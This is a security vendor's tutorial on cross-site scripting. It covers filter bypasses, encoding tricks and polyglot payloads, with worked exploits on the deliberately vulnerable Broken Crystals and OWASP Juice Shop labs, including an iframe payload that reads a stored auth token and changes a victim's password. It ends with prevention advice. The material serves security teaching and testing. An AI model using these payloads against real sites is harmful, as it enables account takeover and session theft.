Intro
Cross-site scripting (XSS) is an old but always relevant and dangerous type of attack that plagues almost all web applications, be it older or modern ones. It relies on developers using javascript to enhance the experience of end-users of their application, but when the javascript isn’t properly handled it leads to many possible issues, and one of them is XSS.
Importance of XSS vulnerabilities
The risk of XSS is that the malicious code is usually injected directly into the vulnerable application and not a redirect site that the user might watch out for. So if you often go to example.com and someone sends you a link of one of their articles that goes something like example.com/this-article-is-good?id=%3Cscript%3Ealert%281%29%3C%2Fscript%3E you’ll probably click it because it’s something you’re really used to. What you’re not aware of is that there was some code injected in the site without your or the site’s approval and that code might steal your session, take some screenshots, activate a keylogger, etc…
An even more dangerous type of XSS vulnerability is the persistent one where you don’t even have to click on a link to execute the code, you just browse to some page on a site you trust and an attackers comment containing malicious code that was saved in the database is displayed on the site and suddenly you and everyone who visits that page is triggering something they really don’t want to trigger.
Some known XSS attacks in the wild
One of the most famous examples of XSS is the “Samy“. Samy is one of the fastest spreading malwares in internet history. It abused unsanitized profile posts to inject harmful javascript code that was saved to the database and then activated whenever a user viewed that post, thus spreading the worm to themselves and so on.
Yahoo account hijack via email phishing and XSS, attackers made a page with malicious javascript that would steal cookies of visitors. The attack was executed by sending an email with a link to the popular news page article, but the link linked back to the attacker’s site which contained malicious code.
Types of XSS
The three most common types of XSS are:
– Reflected
– Persistent
– DOM-based XSS
You can read more about these types and how and why they work here.
Attacks
Let’s start with the basics
XSS is a really easy attack to start testing and seeing if you can execute malicious code. To get started, find some possible injection points in your targets and start with some simple basic payloads and see how the page reacts and then try to break it.
Finding possible injection points
The easiest way to find possible injection points is to see if reflection happens somewhere. A good example for this is usually the search bar where once you search for something you get the string you searched back at the top of the page.
In the image above you can clearly see reflection happening and this is a prime spot to start testing for XSS.
Another good place to start injecting is a form in which text will be displayed to a large number of people. A good example of this is comments on a page, a review, post, or basically anything that will be seen by someone other than you.
Inspecting the elements and analyzing the reflection
Once you found a reflection point it’s a good idea to analyze it a bit and see how things are getting reflected, what do they pass through to get reflected back to you and how you can get over some of the common hurdles that developers put in to stop XSS attacks.
A good first step is to inject a bunch of random characters to see if some are blacklisted. this includes characters like < > / ; ! # $ and combinations of them to see if they are all reflected properly. Another good way to see for common blacklisting is doing some basic injections and seeing how they are reflected.
After playing around with the input field itself it’s good to check the frontend code to see if it’s sanitized somewhere. Then, check the javascript files that the input field goes through to see that.
Basic injections
Doing basic injections is a great way to see how the field is reflecting the input and what it’s doing with it behind the scenes.
First start with injecting the most basic alert: <script>alert(1)</script>. What is reflected back to you, just the alert part, maybe you got a popup (if you did you found the goldmine, go ahead and break the whole site because there are probably a bunch more vectors possible), maybe it just filtered out special characters, maybe nothing got reflected, or in the worst case everything got reflected nicely back to you.
Depending on what got reflected back to you you can start crafting your payload.
Here are some examples on different simple injections and bypasses and how to work through them:
1. Basic injection works <script>alert(1)</script> in the URL parameter id (broken_site/xss/1?id=<script>alert(1)</script>)
2. Basic injection doesn’t work but we get some reflection (http://100.26.239.14:3000/vuln/xss/2?id=<script>alert(1)</script>)
In this example we see that there is reflection but the script tags are filtered out, let’s play a bit with them to see how we can get them displayed.
Let’s see if capitalization breaks out of the blacklisting. Next payload is broken/site/xss/2?id=<sCriPt>alert(1)</ScRipt>.
And it worked, the filtering used was just checking lowercase/uppercase characters and not mixed case.
3. Let’s try on another page, again we start with basic injection to scout it out broken_site/xss/3?id=<script>alert(1)</script>
Again as in the previous example, let’s mix the case and see how that reacts broken/site/xss/3?id=<sCriPt>alert(1)</ScRipt>
Pretty much the same as the previous try, nothing changed, looks like it sanitizes the input to only one case and then checks it.
Let’s try wrapping it to see if it does just one check or multiple checks. Payload is broken_site/xss/3?id=<sc<script>ript>alert(1)</sc</script>ript>
And this worked, the site just checks once if the payload contains the script tags and removes them, once it removes them we get another set of script tags that we wrapped around the removed ones and we get the successful alert prompt.
4. Page 4, again basic injection to see what’s going on broken_site/xss/4?id=<script>alert(1)</script>
Here we get an interesting reflection, where some tags are still there but there is no script.
Let’s try wrapping it up to see what’s happening with the payload broken_site/xss/4?id=<sc<script>ript>alert(1)</sc</script>ript>
It looks like the page uses some sort of regex to filters the script out, let’s try something other than script.
Injecting a basic a tag and seeing how the site reacts to that. Payload is broken_site/xss/4?id=<a onmouseover="alert(1)">Click me!</a>. What we do here is basically create a link that says click me, and when we hover the mouse over it, the alert box should execute.
We have the link on the site, let’s try hovering over it to see if we get the alert box.
And that worked because the whole focus of filtering was the script tag, the developers forgot about a tag and left that for the injections.
5. Another page, again we try the basic injection to see what’s going on with the site broken_site/xss/5?id=<script>alert(1)</script>
Nothing gets reflected, let’s try wrapping it and seeing how it behaves then. Payload is broken_site/xss/5?id=<sc<script>ript>alert(1)</sc</script>ript>
We get some reflection, but it doesn’t really help us out.
Let’s try with the a tag and see how it behaves, we’re still not sure what’s being filtered here.
Payload is broken_site/xss/5?id=<a onmouseover="alert(1)">Click me!</a>
We get the link but when we try to hover over it, it doesn’t actually execute anything. So it isn’t the script tag that is being filtered out but the alert is the culprit here. Let’s try converting it from ascii code to characters using some basic JS. Open up your developer tools by pressing F12 in your favorite browser and go to the Console tab. Type the following String.fromCharCode(97) and press Enter. You should get the character a displayed in your console. Now let’s craft up our alert box with this. Function is String.fromCharCode(97, 108, 101, 114, 116, 40, 49, 41) and let’s put that into eval so it executes.
Payload is broken_site/xss/5?id=<a onmouseover="eval(String.fromCharCode(97, 108, 101, 114, 116, 40, 49, 41))">Click me!</a>
And once we hover on it.
It worked.
Another thing that would’ve worked in this case if we injected prompt or confirm instead of alert.
This is the standard way of working through to figure out how to get the prompt to appear, iteratively trying things until something sticks and then modifying the thing that sticks the best to get the prompt. Another good thing to do is to inspect the element and see the code around it to see if you can get something out of that. It’s really useful for detecting DOM-XSS issues.
The site we used to test these injections is Broken Crystals, and you can also contribute to it to make it better.
Going crazy with the payloads
XSS Payloads can and do get really crazy real fast, and the AppSec community created some great payloads that you can just copy and paste to see if they work.
Some common bypasses are:
– Encodings
– URL encoding
<script>alert(1)</script> to %3Cscript%3Ealert%281%29%3C%2Fscript%3E
– Base64 encoding
<script>alert(1)</script> to PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==
– Hexadecimal encoding without semicolon
<script>alert(1)</script> to %3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29%3C%2F%73%63%72%69%70%74%3E
– Decimal HTML character
<script>alert(1)</script> to <script>alert(1)</script><script>alert(1)</script>
– Decimal HTML character without semicolon
<script>alert(1)</script> to <script>alert(1)</script>
– Octal encoding
javascript:prompt(1) to javascript:'160162157155160164506151'
– Unicode encoding %EF%BC%9E -> > and %EF%BC%9C -> <<script>alert(1)</script> to %EF%BC%9Cscript%EF%BC%9Ealert(1)%EF%BC%9C/script%EF%BC%9E
– Using jsfuck
– Embedding encoded characters that don’t break the script (tab, newline, carriage return)
– Embedding tab
<script>alert(1)</script> to <scri pt>alert(1)</script>
– Embedding newline
<script>alert(1)</script> to <scri pt>alert(1)</script>
– Embedding carriage return
<script>alert(1)</script> to <scri pt>alert(1)</script>
– Null breaks
<script>alert(1)</script> to <scri�pt>alert(1)</script>;
Null breaks should be done either through a proxy or by embedding the %00 in the URL query, otherwise they won’t work properly.
– Character bypasses:
– To bypass quotes for string use String.fromCharCode() function
– To bypass quotes in mousedown event <a href="" onmousedown="var name = '';alert(1)//'; alert('smthg')">Link</a>
– To bypass space filter use one of /, 0x0c/^L like:
<a onmouseover="alert(1)">Click me!</a> to <a/onmouseover="alert(1)">Click me!</a>
<a onmouseover="alert(1)">Click me!</a> to <a^Lonmouseover="alert(1)">Click me!</a>
– To bypass parenthesis for string using `
<script>alert(1)</script> to <script>alert`1`</script>
– To bypass closing tags > use nothing, they don’t need to be closed
<svg onload=alert(1);//
– Bypassing on...= filter
– Using null byte
<a onmouseover="alert(1)">Click me!</a> to <a onmouseoverx00="alert(1)">Click me!</a>
– Using vertical tab
<a onmouseover="alert(1)">Click me!</a> to <a onmouseoverx0b="alert(1)">Click me!</a>
– Using a /
<a onmouseover="alert(1)">Click me!</a> to <a onmouseover/="alert(1)">Click me!</a>
– Escaping JS escapes
You’re already working in script tags but you need to escape the quotes to inject your own code:
";alert(1);//
or close the script tag and open up your own immediately after:
</script><script>alert(1);</script>
Polyglots
Polyglots are used to save time when testing for XSS. They usually cover a large variety of injection contexts. They aren’t the end all be all for XSS but they do speed up the process quite a bit. If the polyglot works, you save a lot of time, if it doesn’t you either move on or continue with a lot more specific attack on that input. It all depends on your goal, if it is to test a lot of parameters, polyglots are great, if it is to break a single parameter, you will probably need to dig deep into how that specific part of the application works.
Here is a great polyglot by 0xSobky
jaVasCript:/*-/*`/*`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>x3csVg/<sVg/oNloAd=alert()//>x3e
It covers a large amount of injection contexts and is overall great polyglot to test everything with.
Another great polyglot by s0md3v
-->'"/><sCript><deTailS open x=">" ontoggle=(cou006efirm)``>
You can find many other polyglots here.
Fun on test sites
JuiceShop XSS-es
Reflected XSS Example
On juice-shop, login as any user, and then go to “Account” and “Privacy & Security”. Next go to “Change Password”.
Open developer tools (F12) and go to Network tab and change the password.
You will see this link http://juice-shop.herokuapp.com/rest/user/change-password?current=xxx&new=aaaaa&repeat=aaaaa. And once we probe it a bit we find out that we can change the password without supplying the old password. So the request looks like http://juice-shop.herokuapp.com/rest/user/change-password?new=aaaaa&repeat=aaaaa.
With this we have a way of changing someone’s password but now we need a way of executing the request. If we try to input this in the search box XSS like <img src="http://juice-shop.herokuapp.com/rest/user/change-password?new=aaaaa&repeat=aaaaa"> it won’t work because it doesn’t actually send a request.
So we wrap with iframe and send a proper HttpRequest to get this to work like
<iframe src="javascript:xmlhttp = new XMLHttpRequest();
xmlhttp.open('GET', 'http://juice-shop.herokuapp.com/rest/user/change-password?new=aaaaa;repeat=aaaaa’);
xmlhttp.setRequestHeader('Authorization',`Bearer=${localStorage.getItem('token')}`);
xmlhttp.send();">
</iframe>
And once we add it to search query with URL encoding we get something really proper that works:
http://juice-shop.herokuapp.com/#/search?q=%3Ciframe%20src%3D%22javascript%3Axmlhttp%20%3D%20new%20XMLHttpRequest%28%29%3B%20xmlhttp.open%28%27GET%27%2C%20%27http%3A%2F%2Flocalhost%3A3000%2Frest%2Fuser%2Fchange-password%3Fnew%3Daaaaa%26amp%3Brepeat%3Daaaaa%27%29%3B%20xmlhttp.setRequestHeader%28%27Authorization%27%2C%60Bearer%3D%24%7BlocalStorage.getItem%28%27token%27%29%7D%60%29%3B%20xmlhttp.send%28%29%3B%22%3E
And now we can send this link to our target and their password will be changed to whatever you put there.
Learn more in our detailed guide to reflected xss.
Persistent XSS Example
Login as any user on juice-shop and go to “Account” and then “Profile”. Type in any Username and click “Set Username”. It reflects the pack on the page. After playing around with payloads for a bit we can see that wrapping works here so the payload is <<script>ascript>alert(1)</script>. Now anyone that visits our profile gets popup.
DOM XSS Example
In juice-shop in “Search” field type <iframe src="javascript:alert(1)">. You will get the popup. Copy the URL http://juice-shop.herokuapp.com/#/search?q=%3Ciframe%20src%3D%22javascript:alert(%60xss%60)%22%3E and send it to your target.
Prevention
Reflected and Stored XSS
Reflected and stored cross-site scripting can be sanitized on the server-side and there are multiple ways of doing it.
One great way to start is to use a security encoding library to encode all parameters and user input.
Blacklisting characters that are deemed unsafe won’t really work out in the long run since some malicious user might figure out some bypass for it as it usually happens. What you need to do is whitelist what is allowed.
If you need to insert parameters/user input data into your HTML body somewhere you need to do HTML escape before insert itself. You will also need to HTML entity encode any character that can switch execution context, such as script, style, or event handlers.
Escape attribute if you need to insert parameters/user input data into your HTML common attributes. Don’t use complex attributes like href, src, style or any event handlers. Also quote your attributes since unquoted attributes can be escaped with a lot of different characters, while quotes attributes can only be escaped with the corresponding quote. Escape all non-alphanumeric characters to prevent switching out of the attribute.
Do JavaScript escaping for dynamically generated JS code, where you would need to insert parameters/user data input into either event handlers or script tags. Only real safe place you can put data here is inside any quoted value. Anything else is really tricky to sanitize properly since it’s really easy to switch context.
There are many additional things to keep in mind when preventing XSS and you can read more at OWASP XSS Prevention.
DOM XSS
DOM XSS can’t be sanitized on the server-side since all execution happens on the client-side and thus the sanitization is a bit different.
Always HTML escape and then JavaScript escape any parameter or user data input before inserting it into the HTML subcontext in the execution context.
When inserting into the HTML attribute subcontext in the execution context do JavaScript escape before it.
Avoid including any volatile data (any parameter/user input) in event handlers and JavaScript code subcontexts in an execution context.
There are a lot more ways to help prevent the DOM XSS and you can read more about it at OWASP DOM XSS Prevention.
Summary
Cross-site scripting is an extremely dangerous attack vector that needs constant care and attention to be preventable. Any untrusted data injected into the frontend might cause huge problems.
Both attacking and preventing XSS can get really complicated at all possible levels so follow the proper updated guidelines when protecting and try all the different encodings and bypasses when attacking to have most success.
Cross-site scripting vulnerabilities can be detected by Bright.
Bright tests for vulnerabilities in anything from web apps to IoT devices, including APIs, microservices and mobile applications.
You can sign-up for a free Bright account here.
Additional resources and references
OWASP Cheatsheet
XSS Polyglot – 0xsobky
XSS Polyglot – s0md3v
XSS Payload List
XSS Injection List
Broken crystals
OWASP Juice-shop
OWASP XSS Prevention
OWASP DOM XSS Prevention
